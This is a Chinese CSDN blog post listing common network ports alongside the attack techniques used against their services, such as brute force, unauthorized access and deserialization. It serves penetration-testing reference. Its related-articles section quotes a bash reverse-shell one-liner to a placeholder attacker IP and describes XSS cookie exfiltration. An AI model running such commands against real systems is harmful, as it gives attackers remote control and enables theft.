常见端口以及攻击姿势

最新推荐文章于 2024-08-30 08:31:49 发布
最新推荐文章于 2024-08-30 08:31:49 发布
阅读量4.3k 收藏 38
点赞数 5
分类专栏: 渗透测试总结的方法 文章标签: 常见端口 渗透测试 端口漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bul1et/article/details/84930901
版权
端口号端口说明攻击技巧
21/22/69ftp/tftp:文件传输协议爆破\嗅探\溢出\后门
22ssh:远程连接爆破OpenSSH;28个退格
23telnet:远程连接爆破\嗅探
25smtp:邮件服务邮件伪造
53DNS:域名系统DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙
67/68dhcp劫持\欺骗
110pop3爆破
139samba爆破\未授权访问\远程代码执行
143imap爆破
161snmp爆破
389ldap注入攻击\未授权访问
512/513/514linux r直接使用rlogin
873rsync未授权访问
1080socket爆破:进行内网渗透
1352lotus爆破:弱口令\信息泄漏:源代码
1433mssql爆破:使用系统用户登录\注入攻击
1521oracle爆破:TNS\注入攻击
2049nfs配置不当
2181zookeeper未授权访问
3306mysql爆破\拒绝服务\注入
3389rdp爆破\Shift后门
4848glassfish爆破:控制台弱口令\认证绕过
5000sybase/DB2爆破\注入
5432postgresql缓冲区溢出\注入攻击\爆破:弱口令
5632pcanywhere拒绝服务\代码执行
5900vnc爆破:弱口令\认证绕过
6379redis未授权访问\爆破:弱口令
7001weblogicJava反序列化\控制台弱口令\控制台部署webshell
80/443/8080web常见web攻击\控制台爆破\对应服务器版本漏洞
8069zabbix远程命令执行
9090websphere控制台爆破:控制台弱口令\Java反序列
9200/9300elasticsearch远程代码执行
11211memcacache未授权访问
27017mongodb爆破\未授权访问
冲冲_冲
关注
专栏目录
【网络安全】XSS之Cookie外带攻击姿势及例题详析
等风来
05-19 7253
XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击漏洞进行的攻击攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
masscan扫描结果按端口排序(单IP)
11-27
把masscan扫描结果保存为txt,使用这个脚本进行按端口排序,目前只能排序一个IP
端口漏洞复习
09-04 388
最近两周要回学校,无聊把端口漏洞过一遍吧,这对于以后的安全运维是必备知识啊。 端口端口说明攻击技巧 21/22/69 ftp/tftp:文件传输协议 爆破\嗅探\溢出\后门 22 ssh:远程连接 爆破OpenSSH;28个退格 23 telnet:远程连接 爆破\嗅探 25 smtp:邮件服务 邮件伪造...
这39个端口黑客最常攻击,看看有哪些?
最新发布
Python_0011的博客
08-30 1534
在计算机网络中,端口是指网络通信的端点,用于标识网络中不同的服务或应用程序。每个端口都对应一个特定的网络协议,并且在一个主机的IP地址上可以有多个端口同时开放。端口的编号范围从0到65535,其中较低编号的端口通常用于众所周知的服务(称为“知名端口”),例如HTTP(80端口)、HTTPS(443端口)、FTP(21端口)等。这些端口由IANA(Internet Assigned Numbers Authority)分配给特定的服务和协议。常见的服务如HTTP、FTP、SMTP等都在此范围内。
常见端口(按端口顺序)
计算机辅助工程
12-24 247
端口端口说明 攻击技巧 21/22/69 ftp/tftp:文件传输协议 爆破\嗅探\溢出\后门 22 ssh:远程连接 爆破OpenSSH;28个退格 23 telnet:远程连接 爆破\嗅探 25 smtp:邮件服务 邮件伪造 53 DNS:域名系统 DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙 67/68 dhcp 劫持\欺骗 110 pop3 爆破 139 samba 爆破\未授权访问\远程代码执行 143 imap 爆破 161 snmp 爆破 389
渗透常用端口
luke的博客
07-12 78
FTP通常用作对远程服务器进行管理,典型应用就是对web系统进行管理。一旦FTP密码泄露就直接威胁web系统安全,甚至黑客通过提权可以直接控制服务器。这里剖析渗透FTP服务器的几种方法。(1)基础爆破:ftp爆破工具很多,这里我推owasp的Bruter,hydra以及msf中的ftp爆破模块。(2) ftp匿名访问:用户名:anonymous 密码:为空或者任意邮箱(3)后门vsftpd :version 2到2.3.4存在后门漏洞攻击者可以通过该漏洞获取root权限。(https://www.free
常用渗透端口
weixin_44157145的博客
12-01 740
常用的渗透测试端口
常见端口渗透笔录
里卡多·伊泽克森·多斯·桑托斯·达的博客
03-24 1251
常见端口渗透笔录 这个不是我写的,朋友圈看到的
SSRF攻击姿势汇总
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 1365
前言 这是很早就整理的笔记,今天想起来发到博客上,还是要保持写文章总结的习惯啊。 最近笔者在看讲SSRF、protocol smuggle、HTTP request smuggle、SSO任意跳转,Url解析不一致导致的安全问题。一方面由衷地佩服演讲人的脑洞和安全功底,另外一方面又在笔者又在反思,如果是我,我会怎么去发现此类漏洞,解决方案又是什么。本文不同于各大公众号千篇一律的复现、验证漏洞文章,会加入自己的思考和心得。鉴于文章会存在一些敏感内容,笔者会本着在删除敏感内容的前提下,尽量让大家都能看懂的标准
web渗透常见shell反弹姿势
RuoLi_s的博客
11-28 837
常见反弹shell总结: 一、bash反弹 通用 ① 在kali机里面开启端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 ② 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 ③ 解释 bash -i: 打开一个交互的bash .>&: 标准错误输出重定向到标准输出 /dev/tcp/x.x.x.x/port : 意为调
PHP连接MySQL数据库的必备秘籍:正确姿势常见问题及解决妙招
![PHP连接MySQL数据库的必备秘籍:正确姿势常见问题及解决妙招]...# 1. PHP连接MySQL数据库的基础** PHP连接MySQL数据库是web开发中的常见操作。它允许PHP应用程序与MySQL数据库交互,存储、检索和操作
详细介绍各种端口的入侵方法
08-27
详细介绍了各种端口的入侵方法,欢迎阅读! 详细介绍了各种端口的入侵方法,欢迎阅读! 详细介绍了各种端口的入侵方法,欢迎阅读!
渗透测试入门8之端口渗透
鹿鸣天涯
04-03 1567
渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 端口溢出 smb ms08067 ms17010 ms11058 ... apacheftp... 常见的默认端口 1、web类(web漏洞/敏感目录) 第...
渗透测试常见端口
weixin_50464560的博客
07-18 1434
渗透测试常见端口 在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口,也是笔者慢慢收集起来的,分享出来大家借鉴一下,也欢迎补充 1,web类(web漏洞/敏感目录) 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix  80 web 80-89 web 8000-9090 web 2,数据库类(扫描弱口令) 1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreS...
渗透测试常见端口总结
2301_79977730的博客
04-09 1598
当然这也是系统合法的服务,通常是不会被杀毒软件所查杀的。1521是大型数据库Oracle的默认监听端口,估计新手还对此端口比较陌生,平时大家接触的比较多的是Access,MSSQL以及MYSQL这三种数据库。目前黑客对80端口攻击典型是采用SQL注入的攻击方法,脚本渗透技术也是一项综合性极高的web渗透技术,同时脚本渗透技术对80端口也构成严重的威胁。telnet是一种旧的远程管理方式,使用telnet工具登录系统过程中,网络上传输的用户和密码都是以明文方式传送的,黑客可使用嗅探技术截获到此类密码。
常见端口渗透导图
Liu_Bruce的博客
08-16 268
本人花了近一个小时的时间总结制作常见端口渗透导图,希望对大家有所借鉴和帮助。
渗透测试中的端口利用
原味瓜子、的博客
09-24 2492
文章目录端口渗透图解详解端口渗透 我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务,服务可能对应的漏洞端口渗透图解 详解端口渗透 文件共享端口渗透 FTP服务 FTP服务:ftp服务我分为两种情况,第一种是使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件;第二种是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等。 默认端口 20(
【网络安全】常见端口渗透笔录
A1_3_9_7的博客
02-21 986
面对一个目标主机时,我们往往通过端口扫描来了解目标主机开放的端口和服务。当看到一个端口号时,你是否已经猜到它是什么服务,以及它可能存在哪些安全漏洞和利用姿势呢?今天分享一些常见端口服务及漏洞利用,帮助你快速找到获取主机权限的攻击路径。
常见端口和协议以及它们的攻击方式
04-19
我可以回答这个问题。常见端口和协议有: 1. FTP (文件传输协议) - FTP使用21号端口攻击方式包括Brute Force攻击端口扫描和暴力破解攻击。 2. SSH (安全外壳协议) - SSH使用22号端口攻击方式包括暴力破解攻击和中间人攻击。 3. Telnet (远程操作协议) - Telnet使用23号端口攻击方式包括密码攻击、中间人攻击端口扫描。 4. HTTP (超文本传输协议) - HTTP使用80号端口攻击方式包括跨站点脚本攻击、SQL注入攻击和DDoS攻击。 5. SMTP (简单邮件传输协议) - SMTP使用25号端口攻击方式包括僵尸网络攻击和拒绝服务攻击。 6. POP3 (邮局协议) - POP3使用110号端口攻击方式包括中间人攻击和暴力破解攻击。 7. IMAP (交互式邮局协议) - IMAP使用143号端口攻击方式包括暴力破解攻击和中间人攻击。 以上只是一些常见端口和协议,攻击方式也只是其中的一些例子。需要注意的是,攻击方式可能会因为不断的进攻而变得不一样,所以应该时刻保持警惕。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值